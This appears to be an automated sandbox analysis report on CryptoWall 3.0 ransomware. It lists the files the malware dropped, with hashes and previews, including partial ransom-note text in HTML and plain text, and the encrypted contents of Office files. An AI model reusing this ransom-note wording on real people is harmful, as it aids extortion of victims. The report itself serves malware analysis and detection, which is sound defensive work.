                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\OFFICE14\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\MEDIA\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\Bibliography\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\Bibliography\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\+Connect to New Data Source.odc

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):606
                                                                                                                          Entropy (8bit):6.728423080747645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TGgdBemCRhp0ZUIcHyn:c+z5U4a8OoDUX+S2TGgtCR30ZUtHyn
                                                                                                                          MD5:032C25D9BF739DD396D9E3A7E0FD013E
                                                                                                                          SHA1:5F0112469E210AD0F899C0A2E32B848E6D1BC860
                                                                                                                          SHA-256:B3236C208F22A273AAAE1DF044E32B116276A6585073D1772FB40C0D681DAE13
                                                                                                                          SHA-512:24FD40CCBA085AF8E8F2CB26373037DC42CC513C02BD47D1FD487968F2D7BBD76713A351D6DBFF9593E6647BA2C229517D24107DB3D374A9390D91F34479830F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....^G..c..0..4.....lp...bm.|...P.B..++Y..>Q..(....G&l.z,"V..SI.~5./.....n......eN.I|b.p|.aj..jvp..j....+X..A..x........ %.r)M%b.l;.8dD.'.5...>".d<6P$Yez..L>Ju........L..4......!>..3R.=....L.y.....T....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\+Connect to New Data Source.odc.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):606
                                                                                                                          Entropy (8bit):6.728423080747645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2TGgdBemCRhp0ZUIcHyn:c+z5U4a8OoDUX+S2TGgtCR30ZUtHyn
                                                                                                                          MD5:032C25D9BF739DD396D9E3A7E0FD013E
                                                                                                                          SHA1:5F0112469E210AD0F899C0A2E32B848E6D1BC860
                                                                                                                          SHA-256:B3236C208F22A273AAAE1DF044E32B116276A6585073D1772FB40C0D681DAE13
                                                                                                                          SHA-512:24FD40CCBA085AF8E8F2CB26373037DC42CC513C02BD47D1FD487968F2D7BBD76713A351D6DBFF9593E6647BA2C229517D24107DB3D374A9390D91F34479830F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....^G..c..0..4.....lp...bm.|...P.B..++Y..>Q..(....G&l.z,"V..SI.~5./.....n......eN.I|b.p|.aj..jvp..j....+X..A..x........ %.r)M%b.l;.8dD.'.5...>".d<6P$Yez..L>Ju........L..4......!>..3R.=....L.y.....T....

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\+NewSQLServerConnection.odc

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):622
                                                                                                                          Entropy (8bit):6.728876161724913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS27VWbz8IcZ1M7fcDGIaU/fIp:c+z5U4a8OoDUX+S27VW8fM7fcdep
                                                                                                                          MD5:0B50CED734C993B76B9D400F38D2074D
                                                                                                                          SHA1:D89C1EA62BA93448E2CD88A87CF4D69F89C938C2
                                                                                                                          SHA-256:98EF7CF3826FAC1956EADC1D4B551393BEF783A1AF641E1AEC3330E45EE6565E
                                                                                                                          SHA-512:867422502861C6FAD25C177236674ADE49CCC927433743E3F9379ECE7DACCDAC08EBD3E06D1C0DEBAAB82A93C1DE963880E092F2BA9CD1390E22C0595F6C3A2C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..K..+..F...qV.q.o....j.(WE..A..n..P1_.A.O..&.)..q+#..t.%..e(R.......&]].$.............^.]....ggf..r..~..2m.5..Br..........k.`...!^;=..g...5V.r..A..(..<#..%F+.3.......8.0.H..`.,5.`.j.mF.T...J.=.W.."<./1.+U~m{..m.E.<.C]

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\+NewSQLServerConnection.odc.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):622
                                                                                                                          Entropy (8bit):6.728876161724913
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS27VWbz8IcZ1M7fcDGIaU/fIp:c+z5U4a8OoDUX+S27VW8fM7fcdep
                                                                                                                          MD5:0B50CED734C993B76B9D400F38D2074D
                                                                                                                          SHA1:D89C1EA62BA93448E2CD88A87CF4D69F89C938C2
                                                                                                                          SHA-256:98EF7CF3826FAC1956EADC1D4B551393BEF783A1AF641E1AEC3330E45EE6565E
                                                                                                                          SHA-512:867422502861C6FAD25C177236674ADE49CCC927433743E3F9379ECE7DACCDAC08EBD3E06D1C0DEBAAB82A93C1DE963880E092F2BA9CD1390E22C0595F6C3A2C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..K..+..F...qV.q.o....j.(WE..A..n..P1_.A.O..&.)..q+#..t.%..e(R.......&]].$.............^.]....ggf..r..~..2m.5..Br..........k.`...!^;=..g...5V.r..A..(..<#..%F+.3.......8.0.H..`.,5.`.j.mF.T...J.=.W.."<./1.+U~m{..m.E.<.C]

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\DataServices\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.DOC

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.989773860262692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gcm+DNlgIxh/ksLJCNCgyZZiI9bJsUe4riyaUxeLCkVdL6OZyFv:Gj+5Ku/POxMtsUHriyaUxeLCEdTgv
                                                                                                                          MD5:BA7AFF654DD206D2E427546C3E77D7D5
                                                                                                                          SHA1:B1BC612F17D271FF82C39BE009AC4EB0CF10FF85
                                                                                                                          SHA-256:AF9F32D5743C2B6FB3DCBB8C4B8353A3D920DF237E9B1210B507870D88971927
                                                                                                                          SHA-512:BBC10636B0AAD13624033A9C0779AA82AD640BD9B6EF88E952DE772DC9B2BB67E885FCD117EC140E209ACF40B794DB0DC2A845D0C640CC0396BAC258138C40E0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..9.y4..`.-......".N..ID..?kBb...(....F...".9Gl..A3mX........I.f[...L.?/....7...4V....%C.Sd.Bb..{.....H.r.v.?$..-E.J..WO.\*!f..U.Cb..W>..S#...W....G.IH(....VE{.sP..........&L.>.L}j..].ch.|..[<.#W..}Z...B.?nf..A..B...j.>kZ.....6.94lc/.G..K.M...[B`...)>...u.f.*..4.._m..QV-5.W.+../..uS.1..k..E&.y..+.\B.T...).4.#...r.....V?2.a..:%..?Y..T.vU.y\*...by..8...x..j=..`..3N$,.....R++.._._...o...FOo..1#.~....vk..2...2|)..Hn..L)M3..:\W.f.4...>.#.....%/..../c#...pG|k..;.Q..!..c...F..M=.....n.0kH'...........%P.#.....8......v.(6..M..=.....n...D.f...I.....^.Z.\Q.k.-.d..M..DO..y..k...^!W

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.DOC.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20398
                                                                                                                          Entropy (8bit):7.989773860262692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:Gcm+DNlgIxh/ksLJCNCgyZZiI9bJsUe4riyaUxeLCkVdL6OZyFv:Gj+5Ku/POxMtsUHriyaUxeLCEdTgv
                                                                                                                          MD5:BA7AFF654DD206D2E427546C3E77D7D5
                                                                                                                          SHA1:B1BC612F17D271FF82C39BE009AC4EB0CF10FF85
                                                                                                                          SHA-256:AF9F32D5743C2B6FB3DCBB8C4B8353A3D920DF237E9B1210B507870D88971927
                                                                                                                          SHA-512:BBC10636B0AAD13624033A9C0779AA82AD640BD9B6EF88E952DE772DC9B2BB67E885FCD117EC140E209ACF40B794DB0DC2A845D0C640CC0396BAC258138C40E0
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..9.y4..`.-......".N..ID..?kBb...(....F...".9Gl..A3mX........I.f[...L.?/....7...4V....%C.Sd.Bb..{.....H.r.v.?$..-E.J..WO.\*!f..U.Cb..W>..S#...W....G.IH(....VE{.sP..........&L.>.L}j..].ch.|..[<.#W..}Z...B.?nf..A..B...j.>kZ.....6.94lc/.G..K.M...[B`...)>...u.f.*..4.._m..QV-5.W.+../..uS.1..k..E&.y..+.\B.T...).4.#...r.....V?2.a..:%..?Y..T.vU.y\*...by..8...x..j=..`..3N$,.....R++.._._...o...FOo..1#.~....vk..2...2|)..Hn..L)M3..:\W.f.4...>.#.....%/..../c#...pG|k..;.Q..!..c...F..M=.....n.0kH'...........%P.#.....8......v.(6..M..=.....n...D.f...I.....^.Z.\Q.k.-.d..M..DO..y..k...^!W

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.PPT

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981040414247804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GgU1hOA6Zxc93CfbFH1UvDAQhKuFcbm+4xt:Gp16rC3CzIDAQhKWc54P
                                                                                                                          MD5:4A2988EB4EB9416D6A3CB4A07D4BD45B
                                                                                                                          SHA1:361188B39DADCDECBF54FC173E929F78BC5EB8B2
                                                                                                                          SHA-256:859F9423CC4524A89959B9DF8643F6868B1199551A891DB0371B9A983F0823F2
                                                                                                                          SHA-512:C3D61543B4B48E809CA3B8D768877FF229950B416E509101BCB65627E03D7E19FDE91BA4438D1B7613A148BA4744A355A4AADE48B089BB6CF2D818C7919385E4
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.....s.IQX.K.9...0....$.I.u..[@........<....2E.`...>).g...|...O...&.....e...-$,.~..ur........wfU...l.>..L..o5p.g.7....J..J.J.....uD...s.......@.:=....l...(P.{.T.'.....+%...{K.......ec@......e^...:.}..z.......M.>J..}.,.....^.|.t;..Z..c|*O.....F..dX...4g.S0.F...B`.jcn.`.C.gt...N.....u.JR..E.9.v.....l.+.3WM.S.>Q......<....)Hbl.8.U.]."nm.y..bx.A.N..lwPE.VX6^y=....'8..`.sfY..*.X...L..R..H...n.i...:..?&....W8..m.nyonBw..N.l>...\...x.'x{B..3..A.}.9O.........BJ...n...Z.9.....x.m.,d....fJ}...^...<.....z..._Q../..w?K...<.A...^|.R.3.........n|.|...!*..-....)=`..I)....q$WETpt......cu.^.3.

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.PPT.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12718
                                                                                                                          Entropy (8bit):7.981040414247804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GgU1hOA6Zxc93CfbFH1UvDAQhKuFcbm+4xt:Gp16rC3CzIDAQhKWc54P
                                                                                                                          MD5:4A2988EB4EB9416D6A3CB4A07D4BD45B
                                                                                                                          SHA1:361188B39DADCDECBF54FC173E929F78BC5EB8B2
                                                                                                                          SHA-256:859F9423CC4524A89959B9DF8643F6868B1199551A891DB0371B9A983F0823F2
                                                                                                                          SHA-512:C3D61543B4B48E809CA3B8D768877FF229950B416E509101BCB65627E03D7E19FDE91BA4438D1B7613A148BA4744A355A4AADE48B089BB6CF2D818C7919385E4
                                                                                                                          Malicious:false
